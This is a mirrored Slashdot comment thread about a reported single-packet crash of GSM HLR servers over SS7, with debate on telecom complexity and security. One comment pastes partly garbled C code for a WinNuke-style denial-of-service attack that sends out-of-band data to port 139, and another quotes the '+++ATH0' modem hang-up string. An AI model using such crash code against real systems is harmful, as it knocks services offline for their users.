Slashdot Mirror
Lone Packet Crashes Telco Networks
mask.of.sanity writes "A penetration tester has shown that GSM communications systems can be taken down with a handful of malformed packets. The weakness was in the lack of security around the Home Location Register server clusters which store GSM subscriber details as part of the global SS7 network. A single packet, sent from within any network including femtocells, took down one of the clusters for two minutes."
Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.
A missing break statement was what brought down the eastern phone network in North America about 20 years ago. And the same simple problem seems to happen again.
I was wondering why my router was playing the William Tell Overture.
Taco Bell Fire Sauce?
The RF portion of the standards is well designed (take LTE with orthogonal multiplexing for example). However, the systems and switching part is waaay to complex. Telco providers are buried under mountains of technical debt... Even the systems part of LTE is complex: the American implementations from Sprint and Verizon are not be compatible because they cherry picked what parts they felt like implementing.
do my penetration testing with my malformed package
obvious redundancy is obvious
+++ATH0
#naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
Thankfully there are no examples of 'inter-networking' actually working in the wild, much less crazy stuff like hardware that can connect easily to almost any of those 'inter-networked' networks through standardized interfaces and protocols, so we can cut them some slack for failing to achieve such an absurdly difficult task...
GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)
When I was testing a broadband access server at my first job, I've seen a case ping with explicitly specified packet size of 0 caused a divByZeroException on the receiving end. I couldn't resist reporting this bug in person to see the reaction on the developper's face. It was priceless. =)
Someone else had also found a TFTP packet of death, when broadcasted all boxes under test crashed.
Now when you factor in maliciously malformed packets, it doesn't surprise me these things happen at all.
#include
#include
#include
#include
#include
#include
#include
#define dport 139 /* Attack port: 139 is what we want */
int x, s; /* Makes no diff */
char *str = "Bye";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) \n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
* Carthago Delenda Est *
But this sounds more like a feature...
“He’s not deformed, he’s just drunk!”
GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)
BS, you have no idea about what you are talking about. The standards are complex because they are designed for interoperability and extendability (a set of "capabilities" which can be used to create complex telecommunication services).
Us old farts will remember something similar called the Ping-O-Death! ;-)
Hulk SMASH Celiac Disease
I go for many days between calls on my pay-as-you-go Nexus S. Mostly I use skype to communicate with folks so the phone isn't used much as a phone.
Last few years I've noticed a correlation between phone activity and unsolicited marketing calls. Once a day shortly after I take a call I'll get a robocall from some mortgage refinance outfit.
They're listening to radio traffic to target GSM phones that are likely to complete the calls. That or t-mobile is selling call records in real-time to marketers.
https://tools.ietf.org/html/rfc3514
Check the Zapruder trace man, there was clearly a second packet on the grassy knoll! If you trace the first one, it came in via the ethernet port, out the USB, then back in via an SD card - which I say is impossible. Had to be a second packet.
FUD by some self proclaimed security expert, I wounder how he is able to send ss7 packets from a cell site :)
ss7 doesn't reach cell sites only down to BSC's.
I also think it should be kept in mind that GSM technology was standardised in late eighties, and big players such as AT&T allready have started shuiting down their GSM networks.
Someone is seeking atention.
I think the best example of inter-networking is worldwide GSM actually. You can take a GSM phone all over Europe and roam just fine.
When Signalling System 7 (SS7) specifications were written, there was no assumption that anyone other than a proper telco could access the network. Of course equal access provisions and telephony developments have peeled back the layers separating the user from the signalling pattern.
Kind of how the Bell System used audio tones to control network functions until finally moving to out of band signalling.
Their thinking at the time was that it offered a solution for sending information across the voice network and that most of the public wouldn't have access to the equipment of a tolerance necessary to generate and interpret those tones. They were very wrong about that part. But more astounding, they published details of the system in their technical publications. So it was sort of naive of them to think nobody would ever hack into the Bell System.
The same is true in the field of other utilities like electric and gas generation and distribution. Look at SCADA - someone got the bright idea to tie SCADA to the network for ease of management. And then all of a sudden they acted all surprised when people started poking around. And as someone familiar with the NERC specifications - the real upshot of NERC is to log for forensics. There's no active prevention per se.
AMPS was the best cell phone scheme. It would travel for miles and would always have a signal even in the sticks. GSM sucks, it isn't reliable in rural areas. CDMA is better than GSM and TDMA but no way competes with AMPS in range. And with AMPS there were no 'packet' issues, there was no internet either with AMPS but that made it safer.
Security probably needs to exist at all layers of the OSI model.
It is true that some forms of security, relating to user data or user transactions, apply at the higher level and thus belong up in the topmost OSI network model layers.
On the other hand, if your lower layers are compromised, channel availability is lost or data is compromised. You can't exactly ignore that sort of security at the lower layers.
Every layer needs enough security so as to not be easily compromised.
Also note that the Internet was always meant to be a system of stacked protocols. We have things like SSL (okay, not perfect, has some flaws of its own) through which we can tunnel TCP/IP traffic. The SSL provides a lot of the security. A lot, but not all. You may note that TCP/IP design or implementation issues have caused critical network unavailability and what amount to security fixes have also been applied there. So even in a layered world, security still needs to exist throughout the protocol stack.
A protocol stack is only as strong as its weakest layer.
It reminds me of a recent major GSM black out :
http://www.computerworlduk.com/news/mobile-wireless/3368648/orange-mobile-database-flaw-affects-26-million-in-france/
Could it be related ?
I suspect that the telco desire to resist moving intelligence to the edges of the network has something to do with it. Ye olde intertubes are not so dumb as they seem; but they are rather closer to just carrying packets and leaving the rest to consenting adults than the cell networks are.
Random magazine reports on talk at random conference by random pen tester dude who sez "Wow the world's telco networks are so insecure like I've hacked them heaps of times I'm pretty 1337" (I'm paraphrasing a bit but that's basically it). Well ... meh.
Although, point that world's telco networks are pretty insecure, and the main limiting factor on the amount of hacking going on is just the amount of people who bother trying, is valid.
Cheers.
I was looking through the slides and I saw a lot of screen shots from Ericsson nodes and lots of boasts such as SMS is easy to intercept ... But no real proof of actual penetration or interception.
Like the slide with the title "printing money". the show a screen shot of someone defining vouchers in Ericsson charging system, yes if you have access to the node you can provision vouchers for prepaid top ups, the tricky part is how do you get access to a node that isn't connected to the Internet ?
It was mostly a lot of bs captain crunch etc it was a while since that was an actual vector